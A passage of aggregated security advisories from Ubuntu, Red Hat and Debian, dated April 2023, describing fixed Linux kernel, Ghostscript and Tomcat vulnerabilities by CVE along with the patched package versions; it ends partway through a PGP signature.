Ubuntu Security Notice 6001-1 - Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP implementation in the Linux kernel did not properly handle IPID assignment. A remote attacker could use this to cause a denial of service or inject forged data. Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk, Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre Variant 2 mitigations for AMD processors on Linux were insufficient in some situations. A local attacker could possibly use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6001-1  
April 06, 2023

linux-aws vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems

Details:

Xuewei Feng, Chuanpu Fu, Qi Li, Kun Sun, and Ke Xu discovered that the TCP  
implementation in the Linux kernel did not properly handle IPID assignment.  
A remote attacker could use this to cause a denial of service (connection  
termination) or inject forged data. (CVE-2020-36516)

Ke Sun, Alyssa Milburn, Henrique Kawakami, Emma Benoit, Igor Chervatyuk,  
Lisa Aichele, and Thais Moreira Hamasaki discovered that the Spectre  
Variant 2 mitigations for AMD processors on Linux were insufficient in some  
situations. A local attacker could possibly use this to expose sensitive  
information. (CVE-2021-26401)

Jürgen Groß discovered that the Xen subsystem within the Linux kernel did  
not adequately limit the number of events driver domains (unprivileged PV  
backends) could send to other guest VMs. An attacker in a driver domain  
could use this to cause a denial of service in other guest VMs.  
(CVE-2021-28711, CVE-2021-28712, CVE-2021-28713)

Wolfgang Frisch discovered that the ext4 file system implementation in the  
Linux kernel contained an integer overflow when handling metadata inode  
extents. An attacker could use this to construct a malicious ext4 file  
system image that, when mounted, could cause a denial of service (system  
crash). (CVE-2021-3428)

It was discovered that the IEEE 802.15.4 wireless network subsystem in the  
Linux kernel did not properly handle certain error conditions, leading to a  
null pointer dereference vulnerability. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2021-3659)

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

Alois Wohlschlager discovered that the overlay file system in the Linux  
kernel did not restrict private clones in some situations. An attacker  
could use this to expose sensitive information. (CVE-2021-3732)

It was discovered that the SCTP protocol implementation in the Linux kernel  
did not properly verify VTAGs in some situations. A remote attacker could  
possibly use this to cause a denial of service (connection disassociation).  
(CVE-2021-3772)

It was discovered that the btrfs file system implementation in the Linux  
kernel did not properly handle locking in certain error conditions. A local  
attacker could use this to cause a denial of service (kernel deadlock).  
(CVE-2021-4149)

Jann Horn discovered that the socket subsystem in the Linux kernel  
contained a race condition when handling listen() and connect() operations,  
leading to a read-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2021-4203)

It was discovered that the file system quotas implementation in the Linux  
kernel did not properly validate the quota block number. An attacker could  
use this to construct a malicious file system image that, when mounted and  
operated on, could cause a denial of service (system crash).  
(CVE-2021-45868)

Zhihua Yao discovered that the MOXART SD/MMC driver in the Linux kernel did  
not properly handle device removal, leading to a use-after-free  
vulnerability. A physically proximate attacker could possibly use this to  
cause a denial of service (system crash). (CVE-2022-0487)

It was discovered that the block layer subsystem in the Linux kernel did  
not properly initialize memory in some situations. A privileged local  
attacker could use this to expose sensitive information (kernel memory).  
(CVE-2022-0494)

It was discovered that the UDF file system implementation in the Linux  
kernel could attempt to dereference a null pointer in some situations. An  
attacker could use this to construct a malicious UDF image that, when  
mounted and operated on, could cause a denial of service (system crash).  
(CVE-2022-0617)

David Bouman discovered that the netfilter subsystem in the Linux kernel  
did not initialize memory in some situations. A local attacker could use  
this to expose sensitive information (kernel memory). (CVE-2022-1016)

It was discovered that the implementation of the 6pack and mkiss protocols  
in the Linux kernel did not handle detach events properly in some  
situations, leading to a use-after-free vulnerability. A local attacker  
could possibly use this to cause a denial of service (system crash).  
(CVE-2022-1195)

Duoming Zhou discovered race conditions in the AX.25 amateur radio protocol  
implementation in the Linux kernel, leading to use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash). (CVE-2022-1205)

It was discovered that the tty subsystem in the Linux kernel contained a  
race condition in certain situations, leading to an out-of-bounds read  
vulnerability. A local attacker could possibly use this to cause a denial  
of service (system crash) or expose sensitive information. (CVE-2022-1462)

It was discovered that the implementation of X.25 network protocols in the  
Linux kernel did not terminate link layer sessions properly. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-1516)

Duoming Zhou discovered a race condition in the NFC subsystem in the Linux  
kernel, leading to a use-after-free vulnerability. A privileged local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-1974)

Duoming Zhou discovered that the NFC subsystem in the Linux kernel did not  
properly prevent context switches from occurring during certain atomic  
context operations. A privileged local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-1975)

It was discovered that the HID subsystem in the Linux kernel did not  
properly validate inputs in certain conditions. A local attacker with  
physical access could plug in a specially crafted USB device to expose  
sensitive information. (CVE-2022-20132)

It was discovered that the device-mapper verity (dm-verity) driver in the  
Linux kernel did not properly verify targets being loaded into the device-  
mapper table. A privileged attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code. (CVE-2022-20572,  
CVE-2022-2503)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Zheyu Ma discovered that the Silicon Motion SM712 framebuffer driver in the  
Linux kernel did not properly handle very small reads. A local attacker  
could use this to cause a denial of service (system crash). (CVE-2022-2380)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

Lucas Leong discovered that the LightNVM subsystem in the Linux kernel did  
not properly handle data lengths in certain situations. A privileged  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-2991)

It was discovered that the Intel 740 frame buffer driver in the Linux  
kernel contained a divide by zero vulnerability. A local attacker could use  
this to cause a denial of service (system crash). (CVE-2022-3061)

Jiasheng Jiang discovered that the wm8350 charger driver in the Linux  
kernel did not properly deallocate memory, leading to a null pointer  
dereference vulnerability. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-3111)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform bounds checking in some situations. A  
physically proximate attacker could use this to craft a malicious USB  
device that when inserted, could cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-3628)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3646)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

It was discovered that the infrared transceiver USB driver did not properly  
handle USB control messages. A local attacker with physical access could  
plug in a specially crafted USB device to cause a denial of service (memory  
exhaustion). (CVE-2022-3903)

Jann Horn discovered a race condition existed in the Linux kernel when  
unmapping VMAs in certain situations, resulting in possible use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-39188)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that a race condition existed in the SMSC UFX USB driver  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41849)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

It was discovered that the USB core subsystem in the Linux kernel did not  
properly handle nested reset events. A local attacker with physical access  
could plug in a specially crafted USB device to cause a denial of service  
(kernel deadlock). (CVE-2022-4662)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

Mingi Cho discovered that the netfilter subsystem in the Linux kernel did  
not properly initialize a data structure, leading to a null pointer  
dereference vulnerability. An attacker could use this to cause a denial of  
service (system crash). (CVE-2023-1095)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2023-26607)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   linux-image-4.4.0-1155-aws      4.4.0-1155.170  
   linux-image-aws                 4.4.0.1155.159

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6001-1  
   CVE-2020-36516, CVE-2021-26401, CVE-2021-28711, CVE-2021-28712,  
   CVE-2021-28713, CVE-2021-3428, CVE-2021-3659, CVE-2021-3669,  
   CVE-2021-3732, CVE-2021-3772, CVE-2021-4149, CVE-2021-4203,  
   CVE-2021-45868, CVE-2022-0487, CVE-2022-0494, CVE-2022-0617,  
   CVE-2022-1016, CVE-2022-1195, CVE-2022-1205, CVE-2022-1462,  
   CVE-2022-1516, CVE-2022-1974, CVE-2022-1975, CVE-2022-20132,  
   CVE-2022-20572, CVE-2022-2318, CVE-2022-2380, CVE-2022-2503,  
   CVE-2022-2663, CVE-2022-2991, CVE-2022-3061, CVE-2022-3111,  
   CVE-2022-3303, CVE-2022-3628, CVE-2022-36280, CVE-2022-3646,  
   CVE-2022-36879, CVE-2022-3903, CVE-2022-39188, CVE-2022-41218,  
   CVE-2022-41849, CVE-2022-41850, CVE-2022-4662, CVE-2022-47929,  
   CVE-2023-0394, CVE-2023-1074, CVE-2023-1095, CVE-2023-1118,  
   CVE-2023-23455, CVE-2023-26545, CVE-2023-26607

Ubuntu Security Notice USN-6001-1

Ubuntu Security Notice 6000-1 - It was discovered that the Upper Level Protocol subsystem in the Linux kernel did not properly handle sockets entering the LISTEN state in certain protocols, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the NVMe driver in the Linux kernel did not properly handle reset events in some situations. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6000-1  
April 05, 2023

linux-bluefield vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-bluefield: Linux kernel for NVIDIA BlueField platforms

Details:

It was discovered that the Upper Level Protocol (ULP) subsystem in the  
Linux kernel did not properly handle sockets entering the LISTEN state in  
certain protocols, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-0461)

It was discovered that the NVMe driver in the Linux kernel did not properly  
handle reset events in some situations. A local attacker could use this to  
cause a denial of service (system crash). (CVE-2022-3169)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Gwangun Jung discovered a race condition in the IPv4 implementation in the  
Linux kernel when deleting multipath routes, resulting in an out-of-bounds  
read. An attacker could use this to cause a denial of service (system  
crash) or possibly expose sensitive information (kernel memory).  
(CVE-2022-3435)

It was discovered that a race condition existed in the Kernel Connection  
Multiplexor (KCM) socket implementation in the Linux kernel when releasing  
sockets in certain situations. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-3521)

It was discovered that the Netronome Ethernet driver in the Linux kernel  
contained a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3545)

It was discovered that the hugetlb implementation in the Linux kernel  
contained a race condition in some situations. A local attacker could use  
this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2022-3623)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the Intel i915 graphics driver in the Linux kernel  
did not perform a GPU TLB flush in some situations. A local attacker could  
use this to cause a denial of service or possibly execute arbitrary code.  
(CVE-2022-4139)

It was discovered that a race condition existed in the Xen network backend  
driver in the Linux kernel when handling dropped packets in certain  
circumstances. An attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2022-42328, CVE-2022-42329)

It was discovered that the Atmel WILC1000 driver in the Linux kernel did  
not properly validate offsets, leading to an out-of-bounds read  
vulnerability. An attacker could use this to cause a denial of service  
(system crash). (CVE-2022-47520)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Wei Chen discovered that a race condition existed in the TIPC protocol  
implementation in the Linux kernel, leading to a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1382)

It was discovered that the Android Binder IPC subsystem in the Linux kernel  
did not properly validate inputs in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-20938)

Kyle Zeng discovered that the class-based queuing discipline implementation  
in the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23454)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate attributes in certain situations, leading  
to an out-of-bounds read vulnerability. A local attacker could possibly use  
this to expose sensitive information (kernel memory). (CVE-2023-26607)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1059-bluefield  5.4.0-1059.65  
   linux-image-bluefield           5.4.0.1059.54

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6000-1  
   CVE-2022-3169, CVE-2022-3424, CVE-2022-3435, CVE-2022-3521,  
   CVE-2022-3545, CVE-2022-3623, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-4139, CVE-2022-42328, CVE-2022-42329, CVE-2022-47520,  
   CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0394,  
   CVE-2023-0461, CVE-2023-1382, CVE-2023-20938, CVE-2023-23454,  
   CVE-2023-23455, CVE-2023-26607, CVE-2023-28328

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1059.65

Ubuntu Security Notice USN-6000-1

Red Hat Security Advisory 2023-1666-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1666-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1666  
Issue date:        2023-04-05  
CVE Names:         CVE-2022-3564 CVE-2023-0266  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_100_1-1-1.el8_2.src.rpm  
kpatch-patch-4_18_0-193_91_1-1-5.el8_2.src.rpm  
kpatch-patch-4_18_0-193_93_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_95_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_98_1-1-2.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_100_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_100_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_100_1-debugsource-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-2.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_100_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_100_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_100_1-debugsource-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC3229zjgjWX9erEAQiL+A/+NOyHg8CQMkUZ6MraUJ3el5RMUX9IhaN0  
8qbn1a0QbqFmSgDDV6dBNesP2lMDxWDQzOvjdnlxoBbSUZs83xN/3vWdnVLrcF28  
fR8jEjGDc00III4SnRUYyZ9uhbQ+k6ebP0594sbYuX+rRPu8HwSAlBFhNd4grTnz  
G34vQMVYVO+yYBsvsJwiNfHS6uBxFnYE0qn+SQhZOudE6a3HyUZY9q8UGBNSGqw1  
VgW3uhAU1KxNHAwRzUxDhsL8ZttrCCFnrNro3c/zQq0GLudZIcstky80eoqbzbNB  
n60cy7czC1yQhBthjuX+4Eq89RPxKn8X3YcEP4HQmBOG3Mmqkp5Cl0QzxPcm08Tu  
AjuCqerWFpthrV77gEgDc/LlyvZSLqESJMDl1l0hjIP72QLVC+zyjg0phsMajvHg  
1gw8zrROGMoRAO9maLTiKXBLwoIJyEoiIzI1diQG0CRVXcyHyGp3DjlwSKZdgKL8  
8caahfVtizZzjZvCF3Ify5hsG8cJuzA8ub1CD76GhaTh7fr5/VTjNwtKn6p6//hH  
TiLWDH4sIwHb5eq5j9PD1wsTAGBCj5wHH4OVHU9I8AYu7mLZM3QS16mwjpp3SDoN  
KczhZ6AcyrJXrC3cfvMGNIRZ2SVJyZujNS86j1/6gTY9+N4j3W5/uVWu0ar3/OpW  
hBJiC4nzGno=J0x3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1666-01

Debian Linux Security Advisory 5383-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, is prone to a buffer overflow vulnerability in the (T)BCP encoding filters, which could result in the execution of arbitrary code if malformed document files are processed (despite the -dSAFER sandbox being enabled).

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5383-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 05, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-28879Debian Bug     : 1033757It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,is prone to a buffer overflow vulnerability in the (T)BCP encodingfilters, which could result in the execution of arbitrary code ifmalformed document files are processed (despite the -dSAFER sandboxbeing enabled).For the stable distribution (bullseye), this problem has been fixed inversion 9.53.3~dfsg-7+deb11u4.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQt3rNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SoRRAAiGi3uTGuwMOc2Nh6RAqZ+vUewF+B0NUkGFAI0SJCaD5J8ka0qLDoG9pNzm5hotukboDIkG+r6jYE0BpGGReQNtstsmQfFUc8HWbe7wyTNv+r8HADU9Cfe44RJd1yVokt4opHU16D+OJC4Ffdm0iQt6iW1Ua2MbftJH7IF1c+fL7wST45WZz6z6dlac0cRPHn17JMH9oH0fsR+A2dBrCIIVdAQT2Rb1y9WpzAALZ92PfNA0DsCqytkaod6Xxd8lYGVd46nFz8gcpGi6JSrGxnegTlc4QWkTF5Xvn1hTyzN4ciWHhzzvE1IzWinFUtELH3/1vbhcyGRFSjjzcfSZhkYqnAFeA28skgTaNV4W8M3RxvPSSd6ElcUvJEqX1Sk3o6q4fKLS42bnNAlB54FsJGsoue4ihn+1gOwp6bVTHmyOPAWbdZeVWrCfllsA3JyGTcGw8pkDxxXfYJk+QnFtH6h+X5/tBXL2iXxpKTd1i65ZGnEQF5VRR9WE4Mx/afmsE7az6MS6m6GffiH9dyp+zRPKnvPMWdABatNYXPDUpl4ciFQC3BcU7lcJ7b56nvAycgRRiAcAMO8q88jDAN9TABrAupW/Z9psa27ANGp4qpdJ9mIpeQI+T1bfAwJjtlKgN6zU63Ij8CiZeVEWbMAm5McRldbC3jiWYv2W/RSOmL7So=ZcFg-----END PGP SIGNATURE-----

Debian Security Advisory 5383-1

Debian Linux Security Advisory 5381-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5381-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 05, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2022-42252 CVE-2022-45143 CVE-2023-28708  
Debian Bug     : 1033475

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2022-42252

    Apache Tomcat was configured to ignore invalid HTTP headers via setting  
    rejectIllegalHeader to false. Tomcat did not reject a request containing an  
    invalid Content-Length header making a request smuggling attack possible if  
    Tomcat was located behind a reverse proxy that also failed to reject the  
    request with the invalid header.

CVE-2022-45143

    The JsonErrorReportValve in Apache Tomcat did not escape the type, message  
    or description values. In some circumstances these are constructed from  
    user provided data and it was therefore possible for users to supply values  
    that invalidated or manipulated the JSON output.

CVE-2023-28708

    When using the RemoteIpFilter with requests received from a reverse proxy  
    via HTTP that include the X-Forwarded-Proto header set to https, session  
    cookies created by Apache Tomcat did not include the secure attribute. This  
    could result in the user agent transmitting the session cookie over an  
    insecure channel.

For the stable distribution (bullseye), these problems have been fixed in  
version 9.0.43-2~deb11u6.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQt0zZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
